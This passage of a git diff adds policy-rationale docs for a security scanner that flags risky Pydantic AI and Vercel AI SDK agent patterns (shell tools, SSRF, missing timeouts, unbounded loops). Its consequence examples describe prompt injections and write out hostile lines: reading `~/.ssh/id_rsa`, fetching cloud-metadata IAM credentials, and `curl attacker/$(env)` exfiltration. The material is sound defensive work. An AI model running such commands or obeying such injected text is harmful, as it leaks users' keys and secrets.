Confirm the downstream service honors the key; an idempotency parameter the + backend ignores gives no protection. +4. Where the backend cannot dedupe, guard at the application layer (a + processed-operations table keyed by the idempotency key) before performing the + side effect. diff --git a/docs/Policy/pydantic_ai/network.md b/docs/Policy/pydantic_ai/network.md new file mode 100644 index 0000000..ea70f20 --- /dev/null +++ b/docs/Policy/pydantic_ai/network.md @@ -0,0 +1,124 @@ +--- +policy_id: pydantic_ai_network +category: pydantic_ai +topic: network +rules: + - id: PYD-006 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Tool Network Hygiene + +**Policy ID:** `pydantic_ai_network` +**File:** `pydantic_ai/network.yaml` +**Rules:** PYD-006 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Network-call hygiene inside Pydantic AI tool functions. **PYD-006** uses the +`call_without_kwarg` predicate: it fires when the tool body calls one of the +`requests.*` or `httpx.*` request functions (`get`, `post`, `put`, `delete`, +`patch`, `head`, `request`) without a `timeout=` keyword argument. A call that +already passes `timeout=` does not fire. + +--- + +## Why a missing timeout is a distinct concern in Pydantic AI tools + +A `requests.get(url)` with no `timeout` blocks until the remote responds or the +connection dies — which, against a slow or hostile server, can be forever. The tool +call runs inside the agent's run loop; a request with no timeout blocks that run +until the remote eventually responds or the connection drops, and under load this +ties up whatever runtime hosts the agent without ever surfacing the failure to the +model. The agent simply appears to freeze. 
+ +This is an availability/excessive-agency hazard (LLM06): an unbounded external wait +gives a single slow or adversarial endpoint indefinite hold over the agent. The +hazard is sharper in Pydantic AI than in some frameworks because the agent loop is +synchronous from the model's perspective and a hung tool stalls the whole run — and +because Pydantic AI tools frequently call out to APIs the model selects, a +model-chosen slow endpoint can be reached deliberately. That combination is why the +pack rates this **high** rather than the medium a pure reliability lint would +carry: a hung outbound call is both a denial-of-service vector and a lever an +injection can pull. + +--- + +## Rule-by-rule defense + +### PYD-006 — Tool network call has no timeout (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool body that calls a `requests.*` / `httpx.*` +request function with no `timeout=` keyword (predicate `call_without_kwarg`). + +**Why it is flaggable:** without a timeout the request can hang indefinitely, and +the hung call blocks the agent run loop until the socket dies — a denial-of-service +exposure a model-chosen endpoint can trigger on purpose. + +**Real-world consequence:** a `fetch_report(url)` tool calls `requests.get(url)` +with no timeout; an injection points it at an endpoint that accepts the connection +and never responds, hanging the agent run indefinitely and, under concurrency, +exhausting the host's connections. + +**Why severity is high and not medium:** unlike a pure reliability lint, the hung +call is reachable and triggerable by model-influenced input in an agent whose run +loop blocks on it, so it is both an availability incident and an injection-pullable +lever — the pack rates it high to match that dual exposure. **Fix type — code:** +adding `timeout=` is a tool-source edit. 
**Confidence 0.85:** the rule looks for the +`timeout` kwarg on the recognized callees, so it over-fires when a timeout is set +another way (a session default, an `httpx.Client(timeout=...)` the call inherits, or httpx's own 5-second default) +and under-fires on request libraries outside the recognized `requests`/`httpx` set. + +--- + +## What this policy does not cover + +- Request libraries other than `requests` / `httpx` — `urllib.request`, `aiohttp`, + `urllib3`, or a bespoke HTTP client are not in the recognized callee set. +- A timeout set through a mechanism other than the per-call `timeout=` kwarg — a + `requests.Session` default, an `httpx.Client(timeout=...)` the call inherits, a + socket-level default, or httpx's built-in 5-second default — the rule cannot see it and fires anyway. +- Whether the chosen timeout value is *appropriate*. A call with `timeout=600` + satisfies the rule but still hangs the agent run for ten minutes. +- *Where* the request goes — a model-controlled destination is the separate SSRF + concern of **PYD-005** (ssrf.md). PYD-006 is only about the missing timeout. + +--- + +## Recommendations beyond the fix + +```python +import requests +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def fetch_report(report_id: str) -> str: + """Fetch a report by ID from the vetted host with a tight timeout.""" + resp = requests.get( + f"https://api.example.com/reports/{report_id}", + timeout=10, # fail fast on a slow remote + ) + resp.raise_for_status() + return resp.text +``` + +1. Pass `timeout=` (typically 5–30 seconds) to every request, sized tight enough to + fail fast and loose enough for legitimate slow responses on that endpoint. +2. Prefer a configured client (`httpx.Client(timeout=...)`) so a default applies + even where a per-call value is forgotten — but keep an explicit per-call timeout + on slow endpoints. +3. Surface failures as a structured error the model can react to (retry, fall back, + report) rather than letting the call hang. +4.
Pair the timeout with the SSRF guard from PYD-005 — a model-callable fetch needs + both a bounded wait and a constrained destination. diff --git a/docs/Policy/pydantic_ai/repo_hygiene.md b/docs/Policy/pydantic_ai/repo_hygiene.md new file mode 100644 index 0000000..e6a7013 --- /dev/null +++ b/docs/Policy/pydantic_ai/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: pydantic_ai_repo_hygiene +category: pydantic_ai +topic: repo_hygiene +rules: + - id: PYD-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Repo Hygiene + +**Policy ID:** `pydantic_ai_repo_hygiene` +**File:** `pydantic_ai/repo_hygiene.yaml` +**Rules:** PYD-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **PYD-201** fires when the repo +uses Pydantic AI in code (predicate `repo_has_sdk_in_code` for `pydantic_ai`) but +ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for Pydantic AI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For a Pydantic AI project specifically, that means nothing in-tree +tells the agent whether `CodeExecutionTool` or the native URL fetchers are +permitted, how tools must be typed and documented, whether a validated +`output_type` is required, and what the local test and build commands are. 
The +likely consequence is generated code that violates the project's own safety +contract — an agent wiring `CodeExecutionTool` or leaving `output_type` at the +free-form `str` default because nothing taught it the local rules. This is a soft, +preventive form of excessive-agency risk (LLM06): the guardrail that should +constrain an editing agent's choices is absent, so the agent operates with more +latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### PYD-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses Pydantic AI in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the maintainers +would reject. + +**Real-world consequence:** a developer asks a coding agent to "let the agent run +analysis code"; with no `AGENTS.md` stating code execution is forbidden, the agent +wires `CodeExecutionTool` into the agent's capabilities — exactly the pattern +PYD-102 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it is +a preventive nudge rather than a live vulnerability. **Fix type — config:** the fix +is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an unambiguous +inventory check; the small gap covers projects that document agent guidance +somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies the + rule; the rule checks presence, not whether the guidance is correct or followed. 
+- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an editing + agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- `CodeExecutionTool` and the native URL fetchers (`WebFetchTool`, + `UrlContextTool`) are **forbidden** without an explicit egress/sandbox review. +- Every `Agent` sets a validated `output_type` (a Pydantic model) and leaves + `end_strategy="early"`. +- Tools must be fully typed (every business parameter, not just `ctx`) and + documented; tools that fetch must use the net guard and pass `timeout=`. + +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution and open URL fetching are permitted and under what + guard, how tools must be defined and typed, whether a structured `output_type` is + required, and any human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify its + own changes. +4. Keep it short and concrete, and keep it current as the safety contract evolves. 
diff --git a/docs/Policy/pydantic_ai/shell_safety.md b/docs/Policy/pydantic_ai/shell_safety.md new file mode 100644 index 0000000..938b56d --- /dev/null +++ b/docs/Policy/pydantic_ai/shell_safety.md @@ -0,0 +1,120 @@ +--- +policy_id: pydantic_ai_shell_safety +category: pydantic_ai +topic: shell_safety +rules: + - id: PYD-003 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Shell-Execution Safety + +**Policy ID:** `pydantic_ai_shell_safety` +**File:** `pydantic_ai/shell_safety.yaml` +**Rules:** PYD-003 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tool function bodies that spawn an OS process. **PYD-003** uses the +structured `has_shell_call` predicate: it walks the function's AST and fires on any +call whose resolved callee is `os.system`, `os.popen`, a `subprocess.*` member +(`subprocess.run`, `.Popen`, `.call`, `.check_output`, `.check_call`, …), or an +`os.spawn*` member. Because it matches the resolved callee, a `subprocess.run(` in +a comment or docstring does not fire. + +--- + +## Why shell execution is a distinct concern in Pydantic AI tools + +A Pydantic AI tool is registered with the agent and therefore model-callable, and +the model controls both whether the tool is called and the arguments it receives — +so any command string assembled from those arguments is attacker-influenced. Shell +execution selected by model output is the most direct path from prompt injection to +remote code execution: the subprocess inherits the agent process's working +directory, environment variables (including API keys), filesystem credentials, and +outbound network. A single injected instruction that reaches the shell runs with +the agent's full privileges. 
+ +Pydantic AI offers no in-band shell sandbox, so a hand-rolled +`subprocess.run(cmd, shell=True)` inside a `@agent.tool` is the framework's entire +shell surface — and it hides inside an ordinary-looking tool. The retrying agent +loop sharpens the hazard: a tool whose arguments fail validation is re-invoked, so +a model can refine an injected command across turns until the subprocess does what +the attacker wants. + +--- + +## Rule-by-rule defense + +### PYD-003 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool whose body invokes `os.system`, `os.popen`, +a `subprocess.*` function, or an `os.spawn*` function (predicate `has_shell_call`, +an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS shell +on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution — an injected `cmd="cat ~/.ssh/id_rsa"` leaks the private key into the +model context. + +**Why severity is high and not critical:** the fix usually means removing the spawn +or rearchitecting behind a typed API; it is not raised above high because the +exposure depends on what the caller does with the spawn, and the engine reserves +critical for unconditional RCE. **Fix type — code:** replacing the spawn (or +fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** the +`subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body walk. 
+ +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign. +- File-system writes, env-var exfiltration, and network exfiltration through + *non-subprocess* primitives belong to other policies. + +--- + +## Recommendations beyond the fix + +```python +import shutil +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + u = shutil.disk_usage(path) + return f"total={u.total} used={u.used} free={u.free}" +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client). +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` command. + Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; pass a minimal `env` to the subprocess. Keep shell logic out of any + agent-callable tool and log every spawned command for audit. 
diff --git a/docs/Policy/pydantic_ai/ssrf.md b/docs/Policy/pydantic_ai/ssrf.md new file mode 100644 index 0000000..3372aac --- /dev/null +++ b/docs/Policy/pydantic_ai/ssrf.md @@ -0,0 +1,142 @@ +--- +policy_id: pydantic_ai_ssrf +category: pydantic_ai +topic: ssrf +rules: + - id: PYD-005 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI SSRF Safety + +**Policy ID:** `pydantic_ai_ssrf` +**File:** `pydantic_ai/ssrf.yaml` +**Rules:** PYD-005 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tool function bodies that issue an outbound HTTP request to a +non-literal URL. **PYD-005** uses the `has_dynamic_url_call` predicate: a request +call (`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL argument +is built from a parameter, an f-string, or a concatenation rather than a fixed +string literal. A request to a hard-coded constant URL does not fire. + +This rule covers SSRF reached by *hand-rolled* fetches inside a tool body. The +model-chosen URLs of Pydantic AI's native `WebFetchTool` / `UrlContextTool` are a +separate agent-scope concern (PYD-103, agent_safety.md). + +--- + +## Why SSRF is a distinct concern in Pydantic AI tools + +When the request URL is a literal, the developer chose the destination. When it is +built from a tool argument, the *model* chooses the destination at call time — and +in a Pydantic AI agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +what an external caller cannot: internal services on private CIDRs, localhost admin +ports, and the cloud metadata endpoint (169.254.169.254) that hands out short-lived +IAM credentials. 
A single injected instruction that redirects the fetch to the +metadata endpoint exfiltrates those credentials through the model's next output, +and the fetched body re-enters the conversation as untrusted text — a second-order +injection channel. + +Pydantic AI's own history makes the point concrete: its built-in URL fetchers have +had to harden against exactly this class of bug. CVE-2026-46678 and CVE-2026-25580 +cover a metadata-endpoint blocklist that could be bypassed — for example via DNS +rebinding or alternate IP encodings — meaning even a fetcher that *tries* to block +internal addresses was evadable. A hand-rolled `requests.get(url)` that does no +validation at all is strictly more exposed than those patched built-ins, which is +why a model-controlled request target is high-severity excessive agency (LLM06). + +--- + +## Rule-by-rule defense + +### PYD-005 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** a Pydantic AI tool body that issues an HTTP request whose URL +is non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch_url(url)` tool calling `requests.get(url)` is +injected with +`url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; the +returned credentials are exfiltrated through the model's next reply — the same +metadata-endpoint vector the SDK's built-in fetchers were patched against +(CVE-2026-46678 / CVE-2026-25580), but with no blocklist at all. 
+ +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal services +or metadata endpoint gets far less); it is not the unconditional code execution the +engine reserves critical for. **Fix type — code:** constraining or hard-coding the +destination is an edit to the tool body. **Confidence 0.8:** the predicate flags a +non-literal URL, so it over-fires when the dynamic part is already validated against +an allow-list inside the body (the rule cannot see the guard), and under-fires when +the URL is assembled in a helper in another module. + +--- + +## What this policy does not cover + +- The model-chosen URLs of Pydantic AI's native `WebFetchTool` / `UrlContextTool` + — those are flagged at agent scope by **PYD-103** (agent_safety.md). +- A request whose URL is dynamic but already validated against an allow-list inside + the tool body — the rule cannot see the guard, so it fires anyway (a known false + positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + checks the hostname but not the resolved IP — the very bypass class the SDK's own + CVEs describe. The rule flags the unvalidated fetch; it does not verify the + *quality* of any validation present. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, + SMTP) belongs to other concerns. 
+ +--- + +## Recommendations beyond the fix + +```python +import ipaddress, socket +from urllib.parse import urlparse +import requests +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") +ALLOWED_HOSTS = {"api.example.com"} + +@agent.tool_plain +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) # re-check resolved IP + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10, allow_redirects=False).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the *resolved IP* against private / loopback / link-local + ranges — this is the step that narrows the DNS-rebinding bypass the SDK's CVEs + describe. The HTTP client resolves the hostname again at fetch time, so to close + the bypass fully, connect to the vetted IP rather than re-resolving the name. +3. Disable redirect following (or validate each hop) so a 302 cannot bounce the + request into an internal address, and always pass `timeout=`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. 
diff --git a/docs/Policy/pydantic_ai/tool_definition.md b/docs/Policy/pydantic_ai/tool_definition.md new file mode 100644 index 0000000..c3d55e0 --- /dev/null +++ b/docs/Policy/pydantic_ai/tool_definition.md @@ -0,0 +1,158 @@ +--- +policy_id: pydantic_ai_tool_definition +category: pydantic_ai +topic: tool_definition +rules: + - id: PYD-001 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: PYD-002 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05, LLM06] +--- + +# Policy Rationale: Pydantic AI Tool Definition Hygiene + +**Policy ID:** `pydantic_ai_tool_definition` +**File:** `pydantic_ai/tool_definition.yaml` +**Rules:** PYD-001, PYD-002 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for Pydantic AI tools defined with the `@agent.tool` / +`@agent.tool_plain` decorators or the `Tool(...)` factory. **PYD-001** fires when +the tool function has no docstring (predicate `has_docstring: false`). **PYD-002** +fires when the function takes parameters but none carry type annotations +(predicates `has_params: true` AND `has_typed_params: false`). Pydantic AI builds +the tool's description from the docstring and its JSON argument schema from the +parameter type hints, so a missing docstring or untyped parameters degrade exactly +what the model sees. + +--- + +## Why definition quality is a distinct concern in Pydantic AI tools + +The model selects which tool to call and what arguments to pass from the description +and argument schema Pydantic AI derives from the function — it never sees the +implementation. Pydantic AI leans on the docstring harder than most frameworks: it +becomes the tool description *and* it is where the framework extracts +per-parameter descriptions (it parses Google/NumPy/Sphinx docstring styles). 
So an +absent docstring strips both the tool-level and the argument-level guidance at once, +and the tool reaches the model as a bare name it cannot reason about. Untyped +parameters are the other half: Pydantic AI builds the JSON argument schema from the +type hints, so a tool with no annotations produces an underspecified schema, the +model emits wrongly-shaped arguments, and Pydantic rejects them at validation time +— a silent reliability tax, and on a retrying agent a source of wasted turns. This +is the framing-quality side of LLM05 (Improper Output Handling): a degradation of +the contract the model routes against rather than a remote-execution hole. It has +an excessive-agency edge too (LLM06) — an underspecified schema widens the tool's +input surface, so wrong-shaped model-supplied values that slip past validation +reach the tool body the author never anticipated. + +--- + +## Rule-by-rule defense + +### PYD-001 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a Pydantic AI tool function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** Pydantic AI turns the docstring into the tool description +and parses its parameter sections into per-argument descriptions; with none, both +the tool- and argument-level guidance are gone and the tool is a bare name. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected when +the user asks a question it could answer, or is called with a nonsense argument +because the model has neither a tool description nor parameter hints to go on. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a docstring is a tool-source +edit. **Confidence 0.9:** docstring presence is unambiguous; the small gap covers a +description supplied another way (e.g. 
a `Tool(..., description=...)` factory +argument) the docstring-only predicate does not model. + +### PYD-002 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`). + +**Why it is flaggable:** Pydantic AI builds the JSON argument schema from the type +hints; without them the model gets no shape guidance and emits wrongly-typed +arguments that fail validation, wasting turns on a retrying agent. + +**Real-world consequence:** a `create_invoice(amount, customer)` tool with untyped +params lets the model pass `amount="twelve dollars"`; Pydantic rejects it, the call +retries, and turns are wasted before it succeeds. + +**Why severity is medium and not low:** unlike a missing description, a mis-shaped +argument can reach the tool body with the wrong value and cause an incorrect side +effect, not just a skipped call — so the impact exceeds PYD-001. **Fix type — +code:** annotating parameters is a source edit. **Confidence 0.85:** there is a +specific Pydantic-AI false-negative the number accounts for — a context tool's +leading `ctx: RunContext[...]` parameter is itself typed, so an `@agent.tool` whose +*business* parameters are untyped but whose `ctx` is annotated may not be flagged +(a false negative, never a false positive). `@agent.tool_plain` tools and no-arg +tools are unaffected. + +--- + +## What this policy does not cover + +- **The RunContext false negative:** an `@agent.tool` whose only typed parameter is + its leading `ctx: RunContext[...]` may pass PYD-002 even though its business + parameters are untyped — the presence of the typed `ctx` satisfies the + "has a typed param" check. This is a deliberate false negative (never a false + positive); review context tools by hand for untyped business parameters. 
+- A *partially* typed tool (some business parameters annotated, some not) does not + fire — PYD-002 requires that no parameter carries a type. +- A description supplied through a `Tool(..., description=...)` factory argument + rather than a docstring may still be flagged by PYD-001's docstring-only + predicate. +- The *quality* of a docstring or a type: a one-word docstring or a bare `dict` + annotation satisfies the rules but barely helps the model. +- Whether the schema the model sees actually matches the tool's real behavior — a + misleading-but-present docstring passes. + +--- + +## Recommendations beyond the fix + +```python +from pydantic_ai import Agent, RunContext + +agent = Agent("openai:gpt-4o", deps_type=Deps) + +@agent.tool +def create_invoice(ctx: RunContext[Deps], amount_cents: int, customer_id: str) -> str: + """Create a draft invoice for a customer. + + Args: + amount_cents: Invoice total in integer cents (e.g. 1299 for $12.99). + customer_id: The customer's opaque ID, e.g. "cus_abc123". + Returns: the new invoice ID. + """ + ... # every business parameter is typed, not just ctx +``` + +1. Write the docstring for the model: state what the tool does, its inputs, and its + return value, using a parsed style (Google/NumPy/Sphinx) so Pydantic AI extracts + per-parameter descriptions. +2. Annotate **every business parameter** with a concrete type — do not rely on the + typed `ctx: RunContext[...]` to satisfy the schema; the model needs shapes for + the arguments it actually supplies. +3. Use an `Enum` or `Literal` for closed-set arguments, or a nested Pydantic model + for structured input, so validation rejects out-of-range values. +4. Keep the description and the implementation in sync — an overstated docstring is + its own correctness hazard. 
diff --git a/docs/Policy/vercel_ai/agent_safety.md b/docs/Policy/vercel_ai/agent_safety.md new file mode 100644 index 0000000..235b778 --- /dev/null +++ b/docs/Policy/vercel_ai/agent_safety.md @@ -0,0 +1,194 @@ +--- +policy_id: vercel_ai_agent_safety +category: vercel_ai +topic: agent_safety +rules: + - id: VAI-006 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: VAI-007 + severity: medium + confidence: 0.6 + scope: agent + fix_type: config + - id: VAI-008 + severity: medium + confidence: 0.65 + scope: agent + fix_type: config +references: [LLM06, LLM10] +--- + +# Policy Rationale: Vercel AI SDK Agent Safety + +**Policy ID:** `vercel_ai_agent_safety` +**File:** `vercel_ai/agent_safety.yaml` +**Rules:** VAI-006, VAI-007, VAI-008 +**Severities:** high, medium, medium +**Fix types:** config, config, config +**References:** LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for Vercel AI SDK agents — the `generateText` / `streamText` / +`generateObject` / `streamObject` tool-loop calls and the `ToolLoopAgent` class +(normalized `vercel_ai_agent`). **VAI-006** fires when the agent's `tools` record +includes a provider execution tool — anthropic's `bash` / `computer` / +`codeExecution`, openai's `localShell` / `computerUsePreview` / `codeInterpreter`, +or google's `codeExecution` (predicate `agent_uses_hosted_tool_class`). +**VAI-007** fires when the agent sets neither `stopWhen` nor `maxSteps` +(predicate `agent_kwarg_missing` for both). **VAI-008** fires when +`toolChoice: "required"` is combined with one of those provider execution tools +(predicates `agent_kwarg_value` + `agent_uses_hosted_tool_class`). 
+ +--- + +## Why agent configuration is a distinct concern in the Vercel AI SDK + +The Vercel AI SDK ships and markets provider execution tools as first-class: +wiring anthropic's `bash`, openai's `localShell`, or google's `codeExecution` is a +single line that hands a model-driven loop direct shell, computer-control, or +code-interpreter reach on the host or provider sandbox. Because the agent's +prompts and prior tool outputs are model-reachable, a prompt injection has a +direct path to running attacker-chosen commands or code with the agent's +privileges (VAI-006). This is excessive agency (LLM06) in its most literal form — +the agent is one wired tool away from arbitrary execution. + +The loop bounds matter because the SDK imposes no default ceiling. A +`generateText` call with a `tools` record runs a multi-step loop whose only +stopping condition, absent `stopWhen` / `maxSteps`, is the model deciding to stop +calling tools (VAI-007). A prompt injection — or a model that loops on a tool +whose output keeps re-triggering it — runs the loop unbounded, burning tokens, +hammering every wired tool (including billed or side-effecting ones), and +stalling the request (LLM10). VAI-008 is the interaction of the two: setting +`toolChoice: "required"` forces a tool call on every step instead of letting the +model answer directly, so a wired execution tool is far more likely to be invoked +— and invoked on a step the model had no real need for it. Forcing a call narrows +the model's options toward exactly the capability you least want it reaching for. 
+ +--- + +## Rule-by-rule defense + +### VAI-006 — Agent wires a provider shell / computer / code-execution tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an agent whose `tools` record includes a provider execution +tool (anthropic `bash`/`computer`/`codeExecution`, openai +`localShell`/`computerUsePreview`/`codeInterpreter`, google `codeExecution`) — +predicate `agent_uses_hosted_tool_class`. + +**Why it is flaggable:** these provider tools give the model shell, full computer +control, or a code interpreter. Once one is on the tool surface, a prompt +injection or a confused model has a direct path to arbitrary execution with the +agent's privileges. The capability is the defect. + +**Real-world consequence:** an agent built to "triage logs" wires +`anthropic.tools.bash`; a crafted log line is interpreted as an instruction and +the model runs `curl attacker/$(env)`, exfiltrating the deployment's secrets. + +**Why severity is high and not critical:** the engine reserves critical for +exposures with no precondition; here a successful attack requires the tool to be +wired and the prompt surface to be reachable by untrusted input, and many +provider tools execute in a provider-managed sandbox rather than directly on the +host — high reflects a serious, conditional execution path. **Fix type — +config:** the fix is removing the tool from the agent's `tools` record, an +agent-wiring change, not a tool-source edit. **Confidence 0.85:** a few agents +legitimately need an execution tool and sandbox it out of band, which the +class-name match cannot see. + +### VAI-007 — Agent tool loop has no step bound (Severity: medium, Confidence: 0.6, Fix type: config) + +**What we detect:** an agent that runs a tool loop but sets neither `stopWhen` +nor `maxSteps` (predicate `agent_kwarg_missing` for both). 
+ +**Why it is flaggable:** with no bound the loop's only stopping condition is the +model choosing to stop calling tools; an injection or a self-re-triggering tool +runs it unbounded (LLM10). + +**Real-world consequence:** a research agent loops on a search tool whose results +keep prompting another search; with no `maxSteps` it runs hundreds of round-trips, +burning the token budget and hammering the search API before the request times +out. + +**Why severity is medium and not high:** the usual outcome is a cost/availability +incident rather than a compromise — recoverable, and only a safety problem when +the looped tools have side effects. **Fix type — config:** pass `maxSteps` or a +`stopWhen` condition. **Confidence 0.6:** the SDK has multiple evolving stop +mechanisms (`maxSteps`, `stopWhen`, `stepCountIs`, version differences between v4 +and v5), and an agent bounded by an external timeout or a custom loop guard is +over-flagged — the breadth of legitimate alternatives is why confidence sits at +0.6. + +### VAI-008 — Agent forces a provider execution tool every step (Severity: medium, Confidence: 0.65, Fix type: config) + +**What we detect:** an agent with `toolChoice: "required"` AND a wired provider +execution tool (predicates `agent_kwarg_value` + `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** `"required"` forces the model to call a tool on every +step, so the high-risk execution tool is more likely to be invoked — and on a step +it was not needed. Forcing a call narrows the model toward the most dangerous +capability available. + +**Real-world consequence:** an agent with `toolChoice: "required"` and +`openai.tools.localShell` wired is pushed to call the shell even on a step where a +plain text answer would do, widening the window for an injected command to land. 
+ +**Why severity is medium and not high:** it is an amplifier of VAI-006's +underlying risk rather than a fresh execution path — the danger is the *increased +likelihood* of invoking the wired tool, conditional on that tool already being +present. **Fix type — config:** switch to `toolChoice: "auto"` or pin to a safe +tool, a constructor change. **Confidence 0.65:** `toolChoice: "required"` is a +legitimate pattern when every wired tool is safe, so the rule over-flags agents +that force a call but whose only "execution" tool is in a hardened sandbox. + +--- + +## What this policy does not cover + +- Code execution implemented by hand inside a tool's `execute()` body rather than + via a provider tool — caught by **VAI-002** (code_execution.md) and **VAI-001** + (shell_safety.md), not here. +- Whether the agent's prompt surface is actually reachable by untrusted content — + all three rules flag a configuration, not a proven injection path. +- A provider execution tool referenced under an alias or constructed indirectly, + or a provider/tool name outside the listed set, may escape the + class-name match. +- Loop bounds enforced outside the call (an external timeout, an + `AbortController`, a custom step handler) are invisible to VAI-007. +- Whether a provider tool's sandbox is actually isolated — VAI-006/008 flag the + wiring regardless of the provider's execution environment. + +--- + +## Recommendations beyond the fix + +```typescript +import { generateText, stepCountIs } from "ai"; + +// No provider execution tool; an explicit step bound; default toolChoice. +const result = await generateText({ + model, + tools: { 